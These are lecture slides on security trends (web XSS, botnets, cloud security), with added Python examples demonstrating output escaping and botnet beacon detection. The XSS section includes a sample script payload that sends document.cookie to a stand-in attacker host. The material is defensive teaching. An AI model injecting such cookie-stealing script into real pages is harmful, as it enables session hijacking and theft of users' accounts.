Trends and Selected Topics in Security
Guo, Yuanxiong, 2009.11.27
Outline
• Overview of Security and Trends
• Three Selected Topics
– Web Security
– Botnet
– Security in Cloud Computing
So many security conferences and experts, but the reality is ... we are getting more and more insecure!!!
Countries whose resources are used to host Malicious Programs in 2008 (From Kaspersky)
China was the absolute leader based on the number of attacks originating from resources located in the country!!!
Countries in which users were attacked in 2008 (From Kaspersky)
It comes as no surprise that China is again in top place!!!
What is Security?
• Most of computer science is concerned with achieving desired behavior
• Security is concerned with preventing undesired behavior
– Different way of thinking!
– An enemy who is actively and maliciously trying to circumvent any protective measures you put in place
Goals of Security
• Prevention – Prevent attackers from violating security policy
• Detection – Detect attackers' violation of security policy
• Recovery – Stop attack, assess and repair damage
• Survivability – Continue to function correctly even if attack succeeds
Components of Security
• Confidentiality – Keeping data and resources hidden.
• Integrity – Preventing unauthorized changes to data or resources.
• Availability – Enabling access to data and resources.
Network Stacks (layer – example technology – attacks at that layer)
• people – phishing attacks, usability
• application – email, Web, NFS – Sendmail, FTP, NFS bugs; chosen-protocol and version-rollback attacks
• session – RPC – RPC worms, portmapper exploits
• transport – TCP – SYN flooding, RIP attacks, sequence number prediction
• network – IP – IP smurfing and other address spoofing attacks
• data link – 802.11 – WEP attacks
• physical – RF – RF fingerprinting, DoS
Research Methodology in the Security Community
• Mathematical modeling: machine learning, data mining, game theory, social network analysis, graph theory, percolation theory, queuing theory, etc.
• Systems: virtual machines, operating systems, compilers, programming languages, software engineering, reverse engineering, etc.
Topics in Security Research
• Important, really existing, or urgent to be solved
• Three Selected Topics
– Web Security
– Botnet
– Security in Cloud Computing
Web Security
Vulnerability Status: Web is ‘Winning’
Recent Website Security Statistics Report by WhiteHat Security Inc. (Nov. 12, 2009)
• 83% of websites have had at least one serious vulnerability
• 64% of websites currently have at least one serious vulnerability
• Web-based Attack is the mainstream
Web Application
• Many sensitive tasks are done through the web
– Online banking, online shopping
– Database access
– System administration
• Ease of detection and exploitation of web vulnerabilities
• Large number of low-grade software applications written by inexperienced developers
• Web applications and web users are targets of many attacks
– Cross site scripting (XSS) (top 1 threat)
– SQL injection
– Cross site request forgery
– PHP Remote File Inclusion
– Session hijacking
– etc.
Cross-Site Scripting Overview
Sequence diagram with three actors (Attack Server, Server Victim, User Victim) and five numbered steps:
1. visit web site
2. receive malicious page
3. click on link
4. echo user input
5. send valuable data
The Setup
• User input is echoed into HTML response.
• Example: search field
– http://victim.com/search.php?term=apple
– search.php responds with:
<HTML> <TITLE> Search Results </TITLE>
<BODY>
Results for <?php echo $_GET['term'] ?> :
. . .
</BODY> </HTML>
• Is this exploitable?
Bad Input
• Problem: no validation of input term
• Consider link (properly URL encoded):
http://victim.com/search.php?term=<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>
• What if user clicks on this link?
1. Browser goes to victim.com/search.php
2. victim.com returns
<HTML> Results for <script> … </script>
3. Browser executes script: sends cookie for victim.com to badguy.com
So What?
• Why would a user click on such a link?
– Phishing email in webmail client (e.g. Gmail).
– Link in DoubleClick banner ad … many, many ways to fool a user into clicking
• What if badguy.com gets the cookie for victim.com?
– Cookie can include session auth for victim.com
– Or other data intended only for victim.com
• Violates same origin policy
Much Worse
• Attacker can execute arbitrary scripts in browser
• Can manipulate any DOM component on victim.com
– Control links on page
– Control form fields (e.g. password field) on this page and linked pages.
• Example: MySpace.com phishing attack injects password field that sends password to bad guy.
Types of XSS vulnerabilities
• DOM-based (local)
– Problem exists within a page's client-side script
• Non-persistent ("reflected")
– Data provided by a web client is used by server-side scripts to generate a page for that user
• Persistent ("stored")
– Data provided to an application is first stored and later displayed to users in a web page
– Potentially more serious if the page is rendered more than once
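The search.php flow from the "Setup" and "Bad Input" slides, together with the stored variant listed above, as an added Python example (not code from the slides): it builds the URL-encoded link, recovers the term on the server side, renders it once the way the slide's search.php does and once with HTML output encoding, and repeats the comparison for a small stored-comment page. The payload string is the one from the slides; victim.com and badguy.com are the slides' illustrative hosts, and the GuestBook class and helper names are assumptions made for this demo.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Payload from the slides' "Bad Input" example: a script that leaks document.cookie
# to badguy.com. Host names are the slides' illustrative ones, not real targets.
PAYLOAD = '<script> window.open("http://badguy.com?cookie=" + document.cookie) </script>'
SEARCH_ENDPOINT = "http://victim.com/search.php"


def build_search_link(term: str) -> str:
    """Build the 'properly URL encoded' link from the slide for any search term."""
    return SEARCH_ENDPOINT + "?term=" + quote(term, safe="")


def term_from_url(url: str) -> str:
    """Server side of the request: recover the decoded 'term' query parameter."""
    return parse_qs(urlsplit(url).query).get("term", [""])[0]


def render_search_vulnerable(term: str) -> str:
    """Mirrors search.php on the slide: the term is echoed into the HTML unchanged."""
    return ("<HTML><TITLE>Search Results</TITLE><BODY>"
            f"Results for {term} :</BODY></HTML>")


def render_search_fixed(term: str) -> str:
    """Hardened form: HTML-encode the untrusted value where it enters markup, so
    '<' becomes '&lt;' and the browser displays text instead of running a script."""
    safe_term = html.escape(term, quote=True)
    return ("<HTML><TITLE>Search Results</TITLE><BODY>"
            f"Results for {safe_term} :</BODY></HTML>")


class GuestBook:
    """Minimal model of the 'stored' type (hypothetical class): comments are saved
    and rendered to every later visitor, so one bad submission is served many times."""

    def __init__(self, escape_output: bool) -> None:
        self.escape_output = escape_output
        self.comments = []

    def post(self, text: str) -> None:
        # Keep the raw text; the defence belongs at output time, where the data
        # meets its HTML context.
        self.comments.append(text)

    def render(self) -> str:
        items = (html.escape(c, quote=True) if self.escape_output else c
                 for c in self.comments)
        return "<ul>" + "".join(f"<li>{c}</li>" for c in items) + "</ul>"


def stored_demo(escape_output: bool) -> str:
    """Post one harmless and one hostile comment, then render the page."""
    book = GuestBook(escape_output)
    book.post("nice site")
    book.post(PAYLOAD)
    return book.render()


def contains_live_script(page: str) -> bool:
    """Demo check: does a raw <script> tag survive in the page that is served?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    term = term_from_url(build_search_link(PAYLOAD))
    print("reflected, vulnerable:", contains_live_script(render_search_vulnerable(term)))
    print("reflected, fixed:     ", contains_live_script(render_search_fixed(term)))
    print("stored, raw output:   ", contains_live_script(stored_demo(False)))
    print("stored, escaped:      ", contains_live_script(stored_demo(True)))
```

The design point is that the same output-encoding step neutralizes both the reflected and the stored case: the server stores or receives whatever it is given, and the encoding is applied exactly where the value is written into HTML. Input validation on `term` would be an additional layer, but it is the output context that decides whether `<` is data or markup.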
Botnet
• Bots: Autonomous programs performing tasks
• Botnets: group of bots
• Available for simultaneous control by bot masters
• A hybrid of many previous threats integrated with a command and control system.
• The root cause of a large number of security problems on the Internet.
Botnets
Botnet Statistics
• By estimation, about 25% of all computers connected to the Internet in the world are infected bots controlled by attackers.
• Size: up to 1.4 million nodes (a real bot army!!!)
• 10 million bot computers were used to distribute spam and malware across the Internet each day
• Honeypot: gather information
– Run unpatched version of Windows
– Usually infected within 10 minutes.
Why Botnets Are So Attractive
• Larger damage: multiple computers grouped together to perform distributed attacks and bring down bigger targets.
• Hidden attacker: attack packets are sent from the bot rather than directly from the attacker.
• Money!!!!!
Botnet Application
One Example of Botnet
1. Attacker launches worm, virus, or other mechanism to infect Windows machines.
2. Infected machines contact botnet controller via IRC.
3. Spammer (sponsor) pays attacker for use of botnet.
4. Spammer uses botnet to send spam emails.
Current Botnet Research
• Measuring the botnet (size, location, etc.)
– Passive analysis of secondary effects caused by infected machines (spam, DNS queries, etc.)
– Infiltration: join the botnet to perform analysis from the inside (using honeypots)
• Defending against the botnet
– Cooperative behaviors
– Signatures
– Attack behaviors
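The "passive analysis of secondary effects" and "cooperative behaviors" items above, as an added Python example (not from the slides): it runs over constructed flow records, flags hosts whose connections to one destination recur at a fixed interval (check-in beaconing), then reports destinations that several beaconing hosts share, which is the cluster pattern a controller leaves behind. The addresses and timestamps are made up for the demo, and the use of TCP port 6667 as the IRC rendezvous port is an assumption; the slides only say the bots contact the controller via IRC.

```python
import statistics
from collections import defaultdict

# Constructed flow records (not captured traffic): "<seconds> <src_ip> <dst_ip> <dst_port>".
# Three internal hosts check in with 203.0.113.9 on port 6667 (assumed IRC C&C port)
# every 60 s; 10.0.0.9 also browses 198.51.100.20:443 at irregular times.
SAMPLE_FLOWS = """\
0 10.0.0.5 203.0.113.9 6667
60 10.0.0.5 203.0.113.9 6667
120 10.0.0.5 203.0.113.9 6667
180 10.0.0.5 203.0.113.9 6667
240 10.0.0.5 203.0.113.9 6667
5 10.0.0.7 203.0.113.9 6667
65 10.0.0.7 203.0.113.9 6667
125 10.0.0.7 203.0.113.9 6667
185 10.0.0.7 203.0.113.9 6667
12 10.0.0.9 203.0.113.9 6667
72 10.0.0.9 203.0.113.9 6667
132 10.0.0.9 203.0.113.9 6667
192 10.0.0.9 203.0.113.9 6667
3 10.0.0.9 198.51.100.20 443
40 10.0.0.9 198.51.100.20 443
41 10.0.0.9 198.51.100.20 443
300 10.0.0.9 198.51.100.20 443
310 10.0.0.9 198.51.100.20 443
"""


def parse_flows(text):
    """Parse the records above into (timestamp, src, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        flows.append((int(ts), src, dst, int(dport)))
    return flows


def find_beacons(flows, min_conns=4, max_cv=0.2):
    """Return sorted (src, dst, dport) keys whose connection timing is suspiciously
    regular. cv = stdev / mean of the gaps between successive connections; a value
    near 0 means a fixed-interval check-in, which browsing traffic rarely shows."""
    times_by_key = defaultdict(list)
    for ts, src, dst, dport in flows:
        times_by_key[(src, dst, dport)].append(ts)
    beacons = []
    for key, times in times_by_key.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap == 0:
            continue
        cv = statistics.pstdev(gaps) / mean_gap
        if cv <= max_cv:
            beacons.append(key)
    return sorted(beacons)


def find_rendezvous_points(beacons, min_hosts=3):
    """Group beaconing hosts by the server they check in with. Several internal hosts
    sharing one regular destination is the cooperative-behaviour signal: one odd host
    is noise, a cluster pointing at the same place looks like a controller."""
    hosts_by_server = defaultdict(set)
    for src, dst, dport in beacons:
        hosts_by_server[(dst, dport)].add(src)
    return {server: sorted(hosts) for server, hosts in hosts_by_server.items()
            if len(hosts) >= min_hosts}


if __name__ == "__main__":
    beacons = find_beacons(parse_flows(SAMPLE_FLOWS))
    for key in beacons:
        print("regular check-in:", key)
    for server, hosts in find_rendezvous_points(beacons).items():
        print("shared rendezvous point:", server, "<-", hosts)
```

On real flow data the thresholds (`min_conns`, `max_cv`, `min_hosts`) need tuning, since legitimate software also polls at fixed intervals (update checks, monitoring agents); the point of the second stage is that an allow-list of known pollers plus the cluster view cuts the false positives that the periodicity test alone would raise.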
Something New: Mobile Botnet (CCS '09)
• The attack target: Home Location Register (HLR), a massive database that stores the details of every SIM card a cellular network operator issues and would typically contain details on up to 5 million subscribers.
• Research results show that a botnet of fewer than 12,000 infected cellphones could disrupt 93 per cent of traffic to an HLR of 1 million subscribers.
• World's first iPhone virus surfaces!!! (Nov. 2009)
Security Issues in Cloud Computing
A Frequently Asked Question:
• Is cloud computing just a reinvention of the wheel?
– Cluster Computing
– Utility Computing
– Software as a Service
– Service Computing
– etc.
• Still under debate, but the general consensus is that all those terms could be summarized under the umbrella of cloud computing
The Latest Working Definition (v15)
• "A pay-per-use model for enabling available, convenient and on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, services) that can be rapidly provisioned and released with minimal management effort or service provider interaction" (From NIST)
• It promotes availability and is composed of five essential characteristics, three service models, and four deployment models.
Five Essential Characteristics
• On-demand self-service
• Ubiquitous network access
• Resource pooling
• Rapid elasticity
• Measured service
Three Service Models
• Cloud Software as a Service
– Use provider's applications over a network
• Cloud Platform as a Service
– Deploy customer-created applications to a cloud
• Cloud Infrastructure as a Service
– Rent processing, storage, network capacity, and other fundamental computing resources
Four Deployment Models
• Private cloud
– Single enterprise owned
• Community cloud
– Shared infrastructure for a specific community
• Public cloud
– Available to the public and owned by an organization selling cloud services
• Hybrid cloud
– Composition of two or more clouds
Benefits of Cloud Computing
• Cost Savings
– Set up and upgrade without huge expense for infrastructure purchase and maintenance; just pay-as-you-go.
• Immediacy
– Provision and utilize a service in a single day, compared to traditional IT projects
– Agility of a business and reduction of the costs caused by time delay
• Availability
– The infrastructures of cloud providers are often powerful and have good load-balancing policies.
Benefits of Cloud Computing (Cont')
• Scalability
– On-demand provisioning and implementation allow for traffic peaks.
• Efficiency
– Shift maintenance activities to the cloud provider
– Focus efforts on innovation, research and development
• Resiliency
– Back-up solution given by cloud providers in disaster scenarios
Security is the Major Issue
Research Topics
• Building Trust in the Cloud
– Effects of different forms of breach reporting on security
– End-to-end data confidentiality in the cloud
– Higher assurance clouds, Virtual Private Cloud, etc.
• Data Protection in Large-Scale Cross-Organization Systems
– Forensics and evidence gathering mechanisms
– Incident handling: monitoring and traceability
– International differences in relevant regulations, including data protection and privacy
Research Topics (Cont')
• Large Scale Computer Systems Engineering
– Resource isolation mechanisms: data, processing, memory, logs, etc.
– Interoperability between cloud providers
– Resilience of cloud computing. How can the cloud improve resilience?
Current Findings
• It has been reported that on a current cloud provider's platform (Amazon EC2), information leakage can arise from sharing physical infrastructure between mutually distrustful users, even when their actions are isolated through machine virtualization, as in a third-party cloud compute service.
• Many security problems need to be identified and solved before the age of cloud computing can come!
Q&A